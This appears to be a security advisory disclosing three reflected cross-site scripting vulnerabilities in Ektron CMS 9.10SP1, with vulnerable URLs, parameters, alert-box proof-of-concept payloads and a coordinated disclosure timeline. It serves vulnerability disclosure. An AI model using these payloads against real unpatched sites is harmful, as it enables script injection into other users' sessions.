Ektron CMS version 9.10SP1 suffers from multiple cross-site scripting (XSS) vulnerabilities.
3902fd0794c6c9915b7128a38de21d8c
# Vulnerability type: Cross Site Scripting
# Vendor: Ektron
# Product: Ektron Content Management System
# Affected version: 9.10SP1(Build 9.1.0.184)
# Patched version: 9.1.0.184SP3(9.1.0.184.3.127)
# Credit: Siyavash Ghasseminia, Edmund Goh
# CVE ID: CVE-2016-6133
# PROOF OF CONCEPT
Vulnerable URL:
/WorkArea/workarea.aspx?page=content.aspx&action=ViewContentByCategory&folder_id=0&LangType=1033
# VULNERABLE PARAMETERS:
- folder_id
# SAMPLE PAYLOAD
- ',1);});alert(1);//
Or
- <script>alert(1)</script>
# TIMELINE
- 1/7/2016: Vulnerability found
- 4/7/2016: Vendor informed
- 13/7/2016: Vendor responded and acknowledged
- 29/7/2016: Vendor fixed the issue
- 19/6/2017: Public disclosure
=================================================================
# Vulnerability type: Cross Site Scripting
# Vendor: Ektron
# Product: Ektron Content Management System
# Affected version: 9.10SP1(Build 9.1.0.184)
# Patched version: 9.1.0.184SP3(9.1.0.184.3.127)
# Credit: Siyavash Ghasseminia
# CVE ID: CVE-2016-6133
# PROOF OF CONCEPT
Vulnerable URL:
/WorkArea/SelectUserGroup.aspx?action=Report&rptStatus
# VULNERABLE PARAMETERS:
- rptStatus
# SAMPLE PAYLOAD
- </script><script>alert(0x0004EA)</script>
# TIMELINE
- 1/7/2016: Vulnerability found
- 4/7/2016: Vendor informed
- 13/7/2016: Vendor responded and acknowledged
- 29/7/2016: Vendor fixed the issue
- 19/6/2017: Public disclosure
=================================================================
# Vulnerability type: Cross Site Scripting
# Vendor: Ektron
# Product: Ektron Content Management System
# Affected version: 9.10SP1(Build 9.1.0.184)
# Patched version: 9.1.0.184SP3(9.1.0.184.3.127)
# Credit: Siyavash Ghasseminia
# CVE ID: CVE-2016-6201
# PROOF OF CONCEPT
Vulnerable URL:
/WorkArea/content.aspx?id=0&action=ViewContentByCategory&LangType=1033&ContType=zjgsa&SubType=0
# VULNERABLE PARAMETERS:
- ContType
# SAMPLE PAYLOAD
- %22%3E%3Cscript%3Ealert(1234567890)%3C%2fscript%3Eumarp
# TIMELINE
- 1/7/2016: Vulnerability found
- 4/7/2016: Vendor informed
- 13/7/2016: Vendor responded and acknowledged
- 29/7/2016: Vendor fixed the issue
- 19/6/2017: Public disclosure